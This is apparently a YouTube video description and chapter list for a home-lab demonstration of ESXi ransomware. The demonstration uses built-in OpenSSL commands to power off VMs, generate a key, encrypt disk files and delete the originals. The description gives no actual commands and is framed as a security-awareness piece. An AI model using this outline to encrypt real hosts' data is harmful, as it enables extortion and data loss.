How easy is it to start encrypting virtual machine disk files in VMware ESXi? Scary easy. In the video we show how you can use simple built-in commands in VMware ESXi to power VMs off, create a key file for encryption, and then begin encrypting files on the ESXi datastore. ESXi contains all the OpenSSL commands needed in-the-box to easily build ESXi ransomware that takes advantage of the native tools. It helps to show the need to secure your ESXi hosts properly.
Subscribe to the channel: https://www.youtube.com/channel/UCrxcWtpd1IGHG9RbD_9380A?sub_confirmation=1
My blog: https://www.virtualizationhowto.com
_____________________________________________________
Social Media: https://twitter.com/vspinmaster
LinkedIn: https://www.linkedin.com/in/brandon-lee-vht/
Github: https://github.com/brandonleegit
Introduction to ESXi ransomware – 0:00
Overivew of attacks on VMware ESXi – 0:34
Description of steps needed for an attacker to compromise your ESXi host – 1:29
An overview of my home lab environment for testing – 2:30
How virtual machines are powered off on the VMware ESXi host – 2:45
Getting all VMs on the ESXi host – 3:15
Getting the VM ID number to power them off – 3:30
Using the VM ID to power off a specific VM – 4:00
Generating a random key file used for the encryption process – 4:33
Performing the encryption process on VMware ESXi – 5:20
Running the encrypt command and refreshing the datastore to see the file created – 6:15
Deleting the source file, the good data so you have no recovery – 6:36
Trying to power on the VMware ESXi virtual machine – 7:00
Is the file truly encrypted can we simply rename? – 7:28
The VMDK is found but it is still not powering on confirming it is encrypted – 7:56
Can we reverse the changes to decrypt the encrypted virtual machine file – 8:26
Running the decryption process using OpenSSL in VMware ESXi – 8:44
Refreshing the directory structure and testing to see if we can power on the ESXi virtual machine – 9:18
Concluding thoughts and wrapping up VMware ESXi ransomware – 10:00
Read my detailed blog post covering the steps listed here:
– https://www.virtualizationhowto.com/2022/08/i-created-esxi-ransomware-its-scary-easy-and-why-you-need-proper-security/
Comments